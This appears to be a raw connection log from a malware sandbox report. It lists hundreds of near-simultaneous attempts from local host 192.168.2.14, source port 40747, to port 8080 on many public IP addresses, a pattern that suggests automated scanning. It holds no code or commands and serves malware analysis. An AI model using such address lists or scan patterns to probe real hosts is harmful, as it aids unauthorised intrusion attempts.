                                                        Feb 14, 2024 09:32:43.809098005 CET407478080192.168.2.1495.114.183.92
                                                        Feb 14, 2024 09:32:43.809108973 CET407478080192.168.2.1462.237.156.102
                                                        Feb 14, 2024 09:32:43.809118032 CET407478080192.168.2.1485.92.46.51
                                                        Feb 14, 2024 09:32:43.809118986 CET407478080192.168.2.1431.216.113.25
                                                        Feb 14, 2024 09:32:43.809123039 CET407478080192.168.2.1485.227.151.154
                                                        Feb 14, 2024 09:32:43.809137106 CET407478080192.168.2.1494.180.157.229
                                                        Feb 14, 2024 09:32:43.809138060 CET407478080192.168.2.1431.67.212.173
                                                        Feb 14, 2024 09:32:43.809151888 CET407478080192.168.2.1485.100.40.74
                                                        Feb 14, 2024 09:32:43.809151888 CET407478080192.168.2.1494.13.60.121
                                                        Feb 14, 2024 09:32:43.809153080 CET407478080192.168.2.1494.130.183.138
                                                        Feb 14, 2024 09:32:43.809169054 CET407478080192.168.2.1485.66.79.32
                                                        Feb 14, 2024 09:32:43.809171915 CET407478080192.168.2.1495.77.123.197
                                                        Feb 14, 2024 09:32:43.809171915 CET407478080192.168.2.1431.250.54.142
                                                        Feb 14, 2024 09:32:43.809171915 CET407478080192.168.2.1431.88.211.223
                                                        Feb 14, 2024 09:32:43.809171915 CET407478080192.168.2.1485.35.63.198
                                                        Feb 14, 2024 09:32:43.809176922 CET407478080192.168.2.1494.7.231.220
                                                        Feb 14, 2024 09:32:43.809181929 CET407478080192.168.2.1462.143.10.113
                                                        Feb 14, 2024 09:32:43.809181929 CET407478080192.168.2.1495.65.211.149
                                                        Feb 14, 2024 09:32:43.809182882 CET407478080192.168.2.1431.237.141.173
                                                        Feb 14, 2024 09:32:43.809182882 CET407478080192.168.2.1495.126.31.55
                                                        Feb 14, 2024 09:32:43.809201002 CET407478080192.168.2.1431.146.151.182
                                                        Feb 14, 2024 09:32:43.809201002 CET407478080192.168.2.1431.129.59.168
                                                        Feb 14, 2024 09:32:43.809201002 CET407478080192.168.2.1485.5.101.112
                                                        Feb 14, 2024 09:32:43.809218884 CET407478080192.168.2.1494.51.149.150
                                                        Feb 14, 2024 09:32:43.809220076 CET407478080192.168.2.1431.230.147.218
                                                        Feb 14, 2024 09:32:43.809226990 CET407478080192.168.2.1494.138.250.63
                                                        Feb 14, 2024 09:32:43.809226990 CET407478080192.168.2.1495.60.18.50
                                                        Feb 14, 2024 09:32:43.809237003 CET407478080192.168.2.1495.128.63.133
                                                        Feb 14, 2024 09:32:43.809242010 CET407478080192.168.2.1485.156.106.232
                                                        Feb 14, 2024 09:32:43.809242010 CET407478080192.168.2.1485.164.127.38
                                                        Feb 14, 2024 09:32:43.809246063 CET407478080192.168.2.1494.187.118.230
                                                        Feb 14, 2024 09:32:43.809248924 CET407478080192.168.2.1462.231.55.36
                                                        Feb 14, 2024 09:32:43.809261084 CET407478080192.168.2.1462.128.2.231
                                                        Feb 14, 2024 09:32:43.809264898 CET407478080192.168.2.1495.146.45.232
                                                        Feb 14, 2024 09:32:43.809273958 CET407478080192.168.2.1494.163.72.167
                                                        Feb 14, 2024 09:32:43.809276104 CET407478080192.168.2.1494.251.66.126
                                                        Feb 14, 2024 09:32:43.809276104 CET407478080192.168.2.1485.217.234.76
                                                        Feb 14, 2024 09:32:43.809276104 CET407478080192.168.2.1431.66.132.95
                                                        Feb 14, 2024 09:32:43.809276104 CET407478080192.168.2.1431.90.60.89
                                                        Feb 14, 2024 09:32:43.809279919 CET407478080192.168.2.1494.130.94.118
                                                        Feb 14, 2024 09:32:43.809281111 CET407478080192.168.2.1495.75.247.209
                                                        Feb 14, 2024 09:32:43.809283972 CET407478080192.168.2.1431.212.74.163
                                                        Feb 14, 2024 09:32:43.809283972 CET407478080192.168.2.1494.244.12.246
                                                        Feb 14, 2024 09:32:43.809304953 CET407478080192.168.2.1462.174.145.134
                                                        Feb 14, 2024 09:32:43.809314013 CET407478080192.168.2.1462.214.161.159
                                                        Feb 14, 2024 09:32:43.809317112 CET407478080192.168.2.1494.148.139.4
                                                        Feb 14, 2024 09:32:43.809318066 CET407478080192.168.2.1431.12.225.160
                                                        Feb 14, 2024 09:32:43.809324980 CET407478080192.168.2.1485.141.197.177
                                                        Feb 14, 2024 09:32:43.809324980 CET407478080192.168.2.1431.110.185.210
                                                        Feb 14, 2024 09:32:43.809324980 CET407478080192.168.2.1495.202.160.249
                                                        Feb 14, 2024 09:32:43.809325933 CET407478080192.168.2.1495.96.46.107
                                                        Feb 14, 2024 09:32:43.809340000 CET407478080192.168.2.1494.192.99.112
                                                        Feb 14, 2024 09:32:43.809341908 CET407478080192.168.2.1431.240.178.249
                                                        Feb 14, 2024 09:32:43.809346914 CET407478080192.168.2.1495.206.245.75
                                                        Feb 14, 2024 09:32:43.809349060 CET407478080192.168.2.1494.49.140.68
                                                        Feb 14, 2024 09:32:43.809365034 CET407478080192.168.2.1495.188.187.217
                                                        Feb 14, 2024 09:32:43.809365034 CET407478080192.168.2.1462.251.3.57
                                                        Feb 14, 2024 09:32:43.809376001 CET407478080192.168.2.1495.207.138.185
                                                        Feb 14, 2024 09:32:43.809384108 CET407478080192.168.2.1494.207.50.158
                                                        Feb 14, 2024 09:32:43.809386015 CET407478080192.168.2.1431.135.35.165
                                                        Feb 14, 2024 09:32:43.809386015 CET407478080192.168.2.1462.89.73.78
                                                        Feb 14, 2024 09:32:43.809390068 CET407478080192.168.2.1495.162.142.21
                                                        Feb 14, 2024 09:32:43.809390068 CET407478080192.168.2.1431.36.212.24
                                                        Feb 14, 2024 09:32:43.809390068 CET407478080192.168.2.1431.55.163.131
                                                        Feb 14, 2024 09:32:43.809390068 CET407478080192.168.2.1495.33.163.37
                                                        Feb 14, 2024 09:32:43.809390068 CET407478080192.168.2.1462.21.158.81
                                                        Feb 14, 2024 09:32:43.809391022 CET407478080192.168.2.1495.66.67.208
                                                        Feb 14, 2024 09:32:43.809390068 CET407478080192.168.2.1494.189.19.130
                                                        Feb 14, 2024 09:32:43.809398890 CET407478080192.168.2.1431.197.51.193
                                                        Feb 14, 2024 09:32:43.809405088 CET407478080192.168.2.1495.203.80.229
                                                        Feb 14, 2024 09:32:43.809411049 CET407478080192.168.2.1494.116.36.9
                                                        Feb 14, 2024 09:32:43.809412003 CET407478080192.168.2.1462.117.63.252
                                                        Feb 14, 2024 09:32:43.809412956 CET407478080192.168.2.1495.157.172.67
                                                        Feb 14, 2024 09:32:43.809412956 CET407478080192.168.2.1494.9.118.110
                                                        Feb 14, 2024 09:32:43.809412956 CET407478080192.168.2.1495.41.158.122
                                                        Feb 14, 2024 09:32:43.809412956 CET407478080192.168.2.1495.85.47.55
                                                        Feb 14, 2024 09:32:43.809425116 CET407478080192.168.2.1495.63.220.234
                                                        Feb 14, 2024 09:32:43.809426069 CET407478080192.168.2.1485.151.131.183
                                                        Feb 14, 2024 09:32:43.809432983 CET407478080192.168.2.1495.184.229.239
                                                        Feb 14, 2024 09:32:43.809432983 CET407478080192.168.2.1431.91.183.74
                                                        Feb 14, 2024 09:32:43.809432983 CET407478080192.168.2.1485.144.108.74
                                                        Feb 14, 2024 09:32:43.809437037 CET407478080192.168.2.1495.93.87.218
                                                        Feb 14, 2024 09:32:43.809439898 CET407478080192.168.2.1431.249.144.252
                                                        Feb 14, 2024 09:32:43.809463978 CET407478080192.168.2.1495.165.16.147
                                                        Feb 14, 2024 09:32:43.809463978 CET407478080192.168.2.1485.41.121.16
                                                        Feb 14, 2024 09:32:43.809465885 CET407478080192.168.2.1485.212.95.7
                                                        Feb 14, 2024 09:32:43.809465885 CET407478080192.168.2.1462.140.175.189
                                                        Feb 14, 2024 09:32:43.809470892 CET407478080192.168.2.1494.157.135.140
                                                        Feb 14, 2024 09:32:43.809473038 CET407478080192.168.2.1431.128.35.86
                                                        Feb 14, 2024 09:32:43.809485912 CET407478080192.168.2.1431.92.32.241
                                                        Feb 14, 2024 09:32:43.809492111 CET407478080192.168.2.1494.42.140.126
                                                        Feb 14, 2024 09:32:43.809492111 CET407478080192.168.2.1485.64.134.93
                                                        Feb 14, 2024 09:32:43.809493065 CET407478080192.168.2.1462.189.237.184
                                                        Feb 14, 2024 09:32:43.809492111 CET407478080192.168.2.1462.64.61.123
                                                        Feb 14, 2024 09:32:43.809492111 CET407478080192.168.2.1431.223.53.42
                                                        Feb 14, 2024 09:32:43.809500933 CET407478080192.168.2.1485.50.133.77
                                                        Feb 14, 2024 09:32:43.809504986 CET407478080192.168.2.1485.65.157.151
                                                        Feb 14, 2024 09:32:43.809506893 CET407478080192.168.2.1462.29.249.164
                                                        Feb 14, 2024 09:32:43.809509039 CET407478080192.168.2.1462.149.110.59
                                                        Feb 14, 2024 09:32:43.809513092 CET407478080192.168.2.1431.204.75.202
                                                        Feb 14, 2024 09:32:43.809513092 CET407478080192.168.2.1495.21.235.78
                                                        Feb 14, 2024 09:32:43.809514046 CET407478080192.168.2.1485.206.242.121
                                                        Feb 14, 2024 09:32:43.809514046 CET407478080192.168.2.1462.93.240.74
                                                        Feb 14, 2024 09:32:43.809521914 CET407478080192.168.2.1431.5.9.155
                                                        Feb 14, 2024 09:32:43.809523106 CET407478080192.168.2.1485.201.132.148
                                                        Feb 14, 2024 09:32:43.809526920 CET407478080192.168.2.1495.1.90.31
                                                        Feb 14, 2024 09:32:43.809531927 CET407478080192.168.2.1495.107.225.21
                                                        Feb 14, 2024 09:32:43.809531927 CET407478080192.168.2.1485.176.227.7
                                                        Feb 14, 2024 09:32:43.809531927 CET407478080192.168.2.1462.139.14.117
                                                        Feb 14, 2024 09:32:43.809534073 CET407478080192.168.2.1494.96.48.150
                                                        Feb 14, 2024 09:32:43.809539080 CET407478080192.168.2.1495.109.252.215
                                                        Feb 14, 2024 09:32:43.809539080 CET407478080192.168.2.1494.27.153.75
                                                        Feb 14, 2024 09:32:43.809547901 CET407478080192.168.2.1462.87.42.231
                                                        Feb 14, 2024 09:32:43.809554100 CET407478080192.168.2.1495.164.224.206
                                                        Feb 14, 2024 09:32:43.809567928 CET407478080192.168.2.1495.155.71.116
                                                        Feb 14, 2024 09:32:43.809570074 CET407478080192.168.2.1494.128.144.149
                                                        Feb 14, 2024 09:32:43.809570074 CET407478080192.168.2.1494.41.4.116
                                                        Feb 14, 2024 09:32:43.809583902 CET407478080192.168.2.1494.252.195.251
                                                        Feb 14, 2024 09:32:43.809585094 CET407478080192.168.2.1494.3.194.70
                                                        Feb 14, 2024 09:32:43.809583902 CET407478080192.168.2.1431.120.15.6
                                                        Feb 14, 2024 09:32:43.809595108 CET407478080192.168.2.1431.154.35.146
                                                        Feb 14, 2024 09:32:43.809597969 CET407478080192.168.2.1431.100.117.32
                                                        Feb 14, 2024 09:32:43.809602022 CET407478080192.168.2.1485.15.158.198
                                                        Feb 14, 2024 09:32:43.809609890 CET407478080192.168.2.1431.146.114.191
                                                        Feb 14, 2024 09:32:43.809612036 CET407478080192.168.2.1485.202.232.111
                                                        Feb 14, 2024 09:32:43.809617996 CET407478080192.168.2.1485.163.234.8
                                                        Feb 14, 2024 09:32:43.809619904 CET407478080192.168.2.1494.131.98.164
                                                        Feb 14, 2024 09:32:43.809619904 CET407478080192.168.2.1495.232.146.14
                                                        Feb 14, 2024 09:32:43.809619904 CET407478080192.168.2.1431.254.243.102
                                                        Feb 14, 2024 09:32:43.809619904 CET407478080192.168.2.1495.242.247.67
                                                        Feb 14, 2024 09:32:43.809624910 CET407478080192.168.2.1462.153.15.121
                                                        Feb 14, 2024 09:32:43.809633017 CET407478080192.168.2.1462.62.147.81
                                                        Feb 14, 2024 09:32:43.809639931 CET407478080192.168.2.1485.131.28.41
                                                        Feb 14, 2024 09:32:43.809639931 CET407478080192.168.2.1494.91.180.82
                                                        Feb 14, 2024 09:32:43.809645891 CET407478080192.168.2.1494.21.79.79
                                                        Feb 14, 2024 09:32:43.809650898 CET407478080192.168.2.1495.75.98.183
                                                        Feb 14, 2024 09:32:43.809659958 CET407478080192.168.2.1431.208.47.73
                                                        Feb 14, 2024 09:32:43.809663057 CET407478080192.168.2.1495.105.39.70
                                                        Feb 14, 2024 09:32:43.809663057 CET407478080192.168.2.1494.21.76.164
                                                        Feb 14, 2024 09:32:43.809681892 CET407478080192.168.2.1462.107.175.115
                                                        Feb 14, 2024 09:32:43.809689045 CET407478080192.168.2.1495.163.39.107
                                                        Feb 14, 2024 09:32:43.809689045 CET407478080192.168.2.1494.57.27.218
                                                        Feb 14, 2024 09:32:43.809689999 CET407478080192.168.2.1485.235.9.36
                                                        Feb 14, 2024 09:32:43.809699059 CET407478080192.168.2.1494.211.183.148
                                                        Feb 14, 2024 09:32:43.809700012 CET407478080192.168.2.1431.186.3.26
                                                        Feb 14, 2024 09:32:43.809700966 CET407478080192.168.2.1462.171.228.142
                                                        Feb 14, 2024 09:32:43.809720993 CET407478080192.168.2.1495.23.135.44
                                                        Feb 14, 2024 09:32:43.809726954 CET407478080192.168.2.1495.145.110.139
                                                        Feb 14, 2024 09:32:43.809727907 CET407478080192.168.2.1485.212.30.82
                                                        Feb 14, 2024 09:32:43.809737921 CET407478080192.168.2.1431.150.177.170
                                                        Feb 14, 2024 09:32:43.809741020 CET407478080192.168.2.1462.20.23.215
                                                        Feb 14, 2024 09:32:43.809741020 CET407478080192.168.2.1494.71.115.35
                                                        Feb 14, 2024 09:32:43.809751034 CET407478080192.168.2.1485.21.8.244
                                                        Feb 14, 2024 09:32:43.809751034 CET407478080192.168.2.1495.2.202.67
                                                        Feb 14, 2024 09:32:43.809763908 CET407478080192.168.2.1495.199.82.11
                                                        Feb 14, 2024 09:32:43.809765100 CET407478080192.168.2.1462.212.21.65
                                                        Feb 14, 2024 09:32:43.809765100 CET407478080192.168.2.1462.55.115.90
                                                        Feb 14, 2024 09:32:43.809771061 CET407478080192.168.2.1494.176.168.188
                                                        Feb 14, 2024 09:32:43.809779882 CET407478080192.168.2.1462.130.154.38
                                                        Feb 14, 2024 09:32:43.809778929 CET407478080192.168.2.1462.59.236.252
                                                        Feb 14, 2024 09:32:43.809778929 CET407478080192.168.2.1485.47.3.135
                                                        Feb 14, 2024 09:32:43.809778929 CET407478080192.168.2.1494.78.45.86
                                                        Feb 14, 2024 09:32:43.809784889 CET407478080192.168.2.1495.20.168.152
                                                        Feb 14, 2024 09:32:43.809786081 CET407478080192.168.2.1494.169.95.85
                                                        Feb 14, 2024 09:32:43.809784889 CET407478080192.168.2.1431.101.59.53
                                                        Feb 14, 2024 09:32:43.809786081 CET407478080192.168.2.1485.171.90.110
                                                        Feb 14, 2024 09:32:43.809792042 CET407478080192.168.2.1494.211.169.43
                                                        Feb 14, 2024 09:32:43.809792995 CET407478080192.168.2.1431.212.157.84
                                                        Feb 14, 2024 09:32:43.809811115 CET407478080192.168.2.1495.150.98.178
                                                        Feb 14, 2024 09:32:43.809820890 CET407478080192.168.2.1462.207.109.63
                                                        Feb 14, 2024 09:32:43.809820890 CET407478080192.168.2.1494.234.201.140
                                                        Feb 14, 2024 09:32:43.809820890 CET407478080192.168.2.1494.193.157.60
                                                        Feb 14, 2024 09:32:43.809825897 CET407478080192.168.2.1431.144.253.180
                                                        Feb 14, 2024 09:32:43.809828997 CET407478080192.168.2.1462.4.1.198
                                                        Feb 14, 2024 09:32:43.809829950 CET407478080192.168.2.1495.146.232.136
                                                        Feb 14, 2024 09:32:43.809834957 CET407478080192.168.2.1431.137.59.81
                                                        Feb 14, 2024 09:32:43.809838057 CET407478080192.168.2.1431.75.143.126
                                                        Feb 14, 2024 09:32:43.809839964 CET407478080192.168.2.1485.95.73.226
                                                        Feb 14, 2024 09:32:43.809839964 CET407478080192.168.2.1431.199.247.81
                                                        Feb 14, 2024 09:32:43.809839964 CET407478080192.168.2.1431.227.47.63
                                                        Feb 14, 2024 09:32:43.809853077 CET407478080192.168.2.1485.179.247.7
                                                        Feb 14, 2024 09:32:43.809854031 CET407478080192.168.2.1485.116.94.64
                                                        Feb 14, 2024 09:32:43.809854031 CET407478080192.168.2.1431.179.119.162
                                                        Feb 14, 2024 09:32:43.809864044 CET407478080192.168.2.1495.160.81.251
                                                        Feb 14, 2024 09:32:43.809873104 CET407478080192.168.2.1495.131.15.193
                                                        Feb 14, 2024 09:32:43.809878111 CET407478080192.168.2.1485.61.99.118
                                                        Feb 14, 2024 09:32:43.809885025 CET407478080192.168.2.1431.253.50.71
                                                        Feb 14, 2024 09:32:43.809885979 CET407478080192.168.2.1495.47.80.191
                                                        Feb 14, 2024 09:32:43.809921980 CET407478080192.168.2.1495.32.251.0
                                                        Feb 14, 2024 09:32:43.809922934 CET407478080192.168.2.1494.35.109.159
                                                        Feb 14, 2024 09:32:43.809922934 CET407478080192.168.2.1431.41.137.13
                                                        Feb 14, 2024 09:32:43.809926987 CET407478080192.168.2.1494.90.67.30
                                                        Feb 14, 2024 09:32:43.809926987 CET407478080192.168.2.1494.206.202.29
                                                        Feb 14, 2024 09:32:43.809926987 CET407478080192.168.2.1485.49.10.214
                                                        Feb 14, 2024 09:32:43.809926987 CET407478080192.168.2.1495.111.89.44
                                                        Feb 14, 2024 09:32:43.809926987 CET407478080192.168.2.1431.217.102.180
                                                        Feb 14, 2024 09:32:43.809941053 CET407478080192.168.2.1494.59.194.169
                                                        Feb 14, 2024 09:32:43.809941053 CET407478080192.168.2.1495.245.184.71
                                                        Feb 14, 2024 09:32:43.809941053 CET407478080192.168.2.1494.139.155.101
                                                        Feb 14, 2024 09:32:43.809942961 CET407478080192.168.2.1494.15.140.50
                                                        Feb 14, 2024 09:32:43.809943914 CET407478080192.168.2.1462.28.225.41
                                                        Feb 14, 2024 09:32:43.809946060 CET407478080192.168.2.1485.237.45.190
                                                        Feb 14, 2024 09:32:43.809952021 CET407478080192.168.2.1494.101.190.242
                                                        Feb 14, 2024 09:32:43.809952974 CET407478080192.168.2.1494.11.38.227
                                                        Feb 14, 2024 09:32:43.809967041 CET407478080192.168.2.1495.155.172.232
                                                        Feb 14, 2024 09:32:43.809977055 CET407478080192.168.2.1462.229.149.73
                                                        Feb 14, 2024 09:32:43.809982061 CET407478080192.168.2.1462.62.122.228
                                                        Feb 14, 2024 09:32:43.809986115 CET407478080192.168.2.1431.53.231.128
                                                        Feb 14, 2024 09:32:43.809986115 CET407478080192.168.2.1494.170.152.164
                                                        Feb 14, 2024 09:32:43.809986115 CET407478080192.168.2.1494.77.175.177
                                                        Feb 14, 2024 09:32:43.809988976 CET407478080192.168.2.1485.76.87.108
                                                        Feb 14, 2024 09:32:43.809988976 CET407478080192.168.2.1431.137.215.97
                                                        Feb 14, 2024 09:32:43.809988976 CET407478080192.168.2.1494.161.98.62
                                                        Feb 14, 2024 09:32:43.809988976 CET407478080192.168.2.1495.68.98.56
                                                        Feb 14, 2024 09:32:43.809988976 CET407478080192.168.2.1495.109.7.30
                                                        Feb 14, 2024 09:32:43.809988976 CET407478080192.168.2.1431.140.217.8
                                                        Feb 14, 2024 09:32:43.809988976 CET407478080192.168.2.1494.188.133.138
                                                        Feb 14, 2024 09:32:43.809998989 CET407478080192.168.2.1494.192.118.163
                                                        Feb 14, 2024 09:32:43.809999943 CET407478080192.168.2.1431.83.65.206
                                                        Feb 14, 2024 09:32:43.809998989 CET407478080192.168.2.1485.17.105.81
                                                        Feb 14, 2024 09:32:43.810003996 CET407478080192.168.2.1494.209.224.56
                                                        Feb 14, 2024 09:32:43.810012102 CET407478080192.168.2.1485.24.37.78
                                                        Feb 14, 2024 09:32:43.810012102 CET407478080192.168.2.1494.136.37.108
                                                        Feb 14, 2024 09:32:43.810019016 CET407478080192.168.2.1495.33.134.244
                                                        Feb 14, 2024 09:32:43.810038090 CET407478080192.168.2.1485.127.182.42
                                                        Feb 14, 2024 09:32:43.810039043 CET407478080192.168.2.1431.229.101.99
                                                        Feb 14, 2024 09:32:43.810039043 CET407478080192.168.2.1485.253.33.171
                                                        Feb 14, 2024 09:32:43.810039997 CET407478080192.168.2.1495.27.108.145
                                                        Feb 14, 2024 09:32:43.810039997 CET407478080192.168.2.1494.3.38.32
                                                        Feb 14, 2024 09:32:43.810039043 CET407478080192.168.2.1494.27.161.245
                                                        Feb 14, 2024 09:32:43.810050011 CET407478080192.168.2.1485.43.107.223
                                                        Feb 14, 2024 09:32:43.810059071 CET407478080192.168.2.1431.19.218.92
                                                        Feb 14, 2024 09:32:43.810061932 CET407478080192.168.2.1431.118.77.189
                                                        Feb 14, 2024 09:32:43.810070992 CET407478080192.168.2.1494.230.93.209
                                                        Feb 14, 2024 09:32:43.810079098 CET407478080192.168.2.1431.109.141.213
                                                        Feb 14, 2024 09:32:43.810081005 CET407478080192.168.2.1431.106.226.31
                                                        Feb 14, 2024 09:32:43.810081959 CET407478080192.168.2.1494.112.95.99
                                                        Feb 14, 2024 09:32:43.810081959 CET407478080192.168.2.1431.203.24.188
                                                        Feb 14, 2024 09:32:43.810086966 CET407478080192.168.2.1431.142.248.49
                                                        Feb 14, 2024 09:32:43.810100079 CET407478080192.168.2.1495.218.201.176
                                                        Feb 14, 2024 09:32:43.810101986 CET407478080192.168.2.1494.94.207.141
                                                        Feb 14, 2024 09:32:43.810102940 CET407478080192.168.2.1462.30.178.153
                                                        Feb 14, 2024 09:32:43.810115099 CET407478080192.168.2.1485.166.57.35
                                                        Feb 14, 2024 09:32:43.810118914 CET407478080192.168.2.1494.167.133.118
                                                        Feb 14, 2024 09:32:43.810121059 CET407478080192.168.2.1462.231.175.174
                                                        Feb 14, 2024 09:32:43.810125113 CET407478080192.168.2.1431.175.228.175
                                                        Feb 14, 2024 09:32:43.810131073 CET407478080192.168.2.1462.229.134.55
                                                        Feb 14, 2024 09:32:43.810147047 CET407478080192.168.2.1485.233.27.64
                                                        Feb 14, 2024 09:32:43.810151100 CET407478080192.168.2.1431.115.149.241
                                                        Feb 14, 2024 09:32:43.810153961 CET407478080192.168.2.1462.132.15.162
                                                        Feb 14, 2024 09:32:43.810153961 CET407478080192.168.2.1485.159.175.39
                                                        Feb 14, 2024 09:32:43.810153961 CET407478080192.168.2.1495.22.81.39
                                                        Feb 14, 2024 09:32:43.810158968 CET407478080192.168.2.1495.125.56.90
                                                        Feb 14, 2024 09:32:43.810177088 CET407478080192.168.2.1431.191.104.51
                                                        Feb 14, 2024 09:32:43.810177088 CET407478080192.168.2.1495.180.64.115
                                                        Feb 14, 2024 09:32:43.810177088 CET407478080192.168.2.1431.229.89.82
                                                        Feb 14, 2024 09:32:43.810194016 CET407478080192.168.2.1431.236.176.91
                                                        Feb 14, 2024 09:32:43.810199976 CET407478080192.168.2.1485.97.78.94
                                                        Feb 14, 2024 09:32:43.810194016 CET407478080192.168.2.1462.233.52.190
                                                        Feb 14, 2024 09:32:43.810199976 CET407478080192.168.2.1485.123.171.187
                                                        Feb 14, 2024 09:32:43.810199976 CET407478080192.168.2.1494.4.7.247
                                                        Feb 14, 2024 09:32:43.810194016 CET407478080192.168.2.1431.85.254.146
                                                        Feb 14, 2024 09:32:43.810194969 CET407478080192.168.2.1494.0.10.138
                                                        Feb 14, 2024 09:32:43.810211897 CET407478080192.168.2.1431.80.120.29
                                                        Feb 14, 2024 09:32:43.810219049 CET407478080192.168.2.1431.3.127.146
                                                        Feb 14, 2024 09:32:43.810218096 CET407478080192.168.2.1485.73.144.100
                                                        Feb 14, 2024 09:32:43.810230017 CET407478080192.168.2.1495.187.8.134
                                                        Feb 14, 2024 09:32:43.810230017 CET407478080192.168.2.1485.92.158.7
                                                        Feb 14, 2024 09:32:43.810230017 CET407478080192.168.2.1462.92.192.214
                                                        Feb 14, 2024 09:32:43.810240984 CET407478080192.168.2.1494.232.193.220
                                                        Feb 14, 2024 09:32:43.810240984 CET407478080192.168.2.1431.239.130.168
                                                        Feb 14, 2024 09:32:43.810250998 CET407478080192.168.2.1485.195.30.24
                                                        Feb 14, 2024 09:32:43.810254097 CET407478080192.168.2.1495.76.67.112
                                                        Feb 14, 2024 09:32:43.810254097 CET407478080192.168.2.1485.193.213.6
                                                        Feb 14, 2024 09:32:43.810265064 CET407478080192.168.2.1462.12.175.97
                                                        Feb 14, 2024 09:32:43.810266972 CET407478080192.168.2.1485.187.231.165
                                                        Feb 14, 2024 09:32:43.810271978 CET407478080192.168.2.1494.6.123.131
                                                        Feb 14, 2024 09:32:43.810272932 CET407478080192.168.2.1485.97.97.1
                                                        Feb 14, 2024 09:32:43.810281038 CET407478080192.168.2.1431.237.218.237
                                                        Feb 14, 2024 09:32:43.810286045 CET407478080192.168.2.1494.57.188.45
                                                        Feb 14, 2024 09:32:43.810286045 CET407478080192.168.2.1495.191.196.153
                                                        Feb 14, 2024 09:32:43.810295105 CET407478080192.168.2.1431.184.34.177
                                                        Feb 14, 2024 09:32:43.810295105 CET407478080192.168.2.1485.168.248.45
                                                        Feb 14, 2024 09:32:43.810302973 CET407478080192.168.2.1495.59.212.97
                                                        Feb 14, 2024 09:32:43.810302973 CET407478080192.168.2.1462.185.49.230
                                                        Feb 14, 2024 09:32:43.810303926 CET407478080192.168.2.1485.226.124.148
                                                        Feb 14, 2024 09:32:43.810302973 CET407478080192.168.2.1462.202.9.82
                                                        Feb 14, 2024 09:32:43.810312033 CET407478080192.168.2.1462.35.250.57
                                                        Feb 14, 2024 09:32:43.810312033 CET407478080192.168.2.1494.5.191.91
                                                        Feb 14, 2024 09:32:43.810314894 CET407478080192.168.2.1494.214.128.116
                                                        Feb 14, 2024 09:32:43.810314894 CET407478080192.168.2.1494.154.130.151
                                                        Feb 14, 2024 09:32:43.810327053 CET407478080192.168.2.1494.225.152.209
                                                        Feb 14, 2024 09:32:43.810331106 CET407478080192.168.2.1431.11.21.30
                                                        Feb 14, 2024 09:32:43.810338020 CET407478080192.168.2.1462.27.60.188
                                                        Feb 14, 2024 09:32:43.810338020 CET407478080192.168.2.1485.47.167.121
                                                        Feb 14, 2024 09:32:43.810340881 CET407478080192.168.2.1431.186.27.243
                                                        Feb 14, 2024 09:32:43.810340881 CET407478080192.168.2.1462.71.167.2
                                                        Feb 14, 2024 09:32:43.810348034 CET407478080192.168.2.1495.190.126.224
                                                        Feb 14, 2024 09:32:43.810348988 CET407478080192.168.2.1431.189.118.221
                                                        Feb 14, 2024 09:32:43.810364008 CET407478080192.168.2.1485.24.96.22
                                                        Feb 14, 2024 09:32:43.810364008 CET407478080192.168.2.1462.92.97.39
                                                        Feb 14, 2024 09:32:43.810364008 CET407478080192.168.2.1494.89.9.200
                                                        Feb 14, 2024 09:32:43.810369968 CET407478080192.168.2.1462.69.41.22
                                                        Feb 14, 2024 09:32:43.810369968 CET407478080192.168.2.1462.17.187.252
                                                        Feb 14, 2024 09:32:43.810379028 CET407478080192.168.2.1485.246.205.149
                                                        Feb 14, 2024 09:32:43.810381889 CET407478080192.168.2.1495.173.44.31
                                                        Feb 14, 2024 09:32:43.810403109 CET407478080192.168.2.1494.38.243.67
                                                        Feb 14, 2024 09:32:43.810403109 CET407478080192.168.2.1462.42.19.14
                                                        Feb 14, 2024 09:32:43.810408115 CET407478080192.168.2.1462.215.1.65
                                                        Feb 14, 2024 09:32:43.810412884 CET407478080192.168.2.1431.181.65.17
                                                        Feb 14, 2024 09:32:43.810415983 CET407478080192.168.2.1485.235.176.91
                                                        Feb 14, 2024 09:32:43.810420990 CET407478080192.168.2.1485.52.4.170
                                                        Feb 14, 2024 09:32:43.810420990 CET407478080192.168.2.1462.118.92.13
                                                        Feb 14, 2024 09:32:43.810441971 CET407478080192.168.2.1495.70.164.227
                                                        Feb 14, 2024 09:32:43.810441971 CET407478080192.168.2.1431.129.178.60
                                                        Feb 14, 2024 09:32:43.810446978 CET407478080192.168.2.1462.141.108.253
                                                        Feb 14, 2024 09:32:43.810450077 CET407478080192.168.2.1462.219.212.204
                                                        Feb 14, 2024 09:32:43.810451031 CET407478080192.168.2.1485.168.249.136
                                                        Feb 14, 2024 09:32:43.810456991 CET407478080192.168.2.1431.205.234.243
                                                        Feb 14, 2024 09:32:43.810461998 CET407478080192.168.2.1462.199.253.254
                                                        Feb 14, 2024 09:32:43.810467958 CET407478080192.168.2.1494.224.179.145
                                                        Feb 14, 2024 09:32:43.810475111 CET407478080192.168.2.1485.73.156.7
                                                        Feb 14, 2024 09:32:43.810483932 CET407478080192.168.2.1431.28.194.20
                                                        Feb 14, 2024 09:32:43.810487032 CET407478080192.168.2.1494.181.174.170
                                                        Feb 14, 2024 09:32:43.810497046 CET407478080192.168.2.1462.230.96.220
                                                        Feb 14, 2024 09:32:43.810497046 CET407478080192.168.2.1462.250.99.181
                                                        Feb 14, 2024 09:32:43.810518026 CET407478080192.168.2.1431.217.14.232
                                                        Feb 14, 2024 09:32:43.810518026 CET407478080192.168.2.1495.159.132.107
                                                        Feb 14, 2024 09:32:43.810520887 CET407478080192.168.2.1495.20.56.3
                                                        Feb 14, 2024 09:32:43.810520887 CET407478080192.168.2.1462.126.193.82
                                                        Feb 14, 2024 09:32:43.810520887 CET407478080192.168.2.1462.145.47.0
                                                        Feb 14, 2024 09:32:43.810520887 CET407478080192.168.2.1494.18.149.0
                                                        Feb 14, 2024 09:32:43.810524940 CET407478080192.168.2.1431.24.45.15
                                                        Feb 14, 2024 09:32:43.810524940 CET407478080192.168.2.1462.192.32.55
                                                        Feb 14, 2024 09:32:43.810524940 CET407478080192.168.2.1431.90.114.224
                                                        Feb 14, 2024 09:32:43.810538054 CET407478080192.168.2.1485.96.220.145
                                                        Feb 14, 2024 09:32:43.810540915 CET407478080192.168.2.1431.165.126.79
                                                        Feb 14, 2024 09:32:43.810545921 CET407478080192.168.2.1485.2.242.221
                                                        Feb 14, 2024 09:32:43.810551882 CET407478080192.168.2.1462.149.56.232
                                                        Feb 14, 2024 09:32:43.810558081 CET407478080192.168.2.1431.89.186.155
